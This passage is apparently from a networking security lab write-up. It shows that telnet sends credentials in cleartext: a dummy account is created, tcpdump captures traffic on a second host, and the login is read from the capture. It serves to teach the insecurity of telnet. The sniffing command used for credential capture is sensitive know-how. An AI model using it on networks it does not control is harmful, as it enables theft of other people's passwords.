Here is how we tested.  The following list of actions was performed exactly in the order in which the actions are numbered:
  1. First, we created a dummy user with user name lakov and password 01234. on Curly.
  2. We run the command tcpdump -x -s 1000 | tee captured.telnet on Larry.  This command captures in hexadecimal mode the first 1000 bytes of an IP packet, or the whole IP packet it if is smaller than 1000 bytes, and prints the captured information both on the screen and into the file captured.telnet (the effect of the tee command.)
  3. We run the command telnet curly on Moe.  When prompted for a login name, we entered lakov and then when prompted for a password, we entered 01234.   You should keep in mind, that the telnet program works in the following way (this is a quick and dirty description): it establishes a TCP connection to the telnet server, and when the user presses a button, the code for that button is sent to the server, and a return command is sent back, which roughly says "now you can print that letter on the screen."  So, even if we are able to capture the keystrokes, you should expect to see the user name and the password in separate packets, one symbol per packet, rather than together in one packet.

    4. Finally, we logged on Curly.  Unfortunately, the file captured.telnet on Larry now contained the user name and the password.  For brevity, we decided to include only that part of captured.telnet which shows how we can extract password, but we could have also included the dump of the user name and any commands that the user typed after he/she had gained access to the machine.  Here is that specific part of captured.telnet - first in its raw version, and then annotated.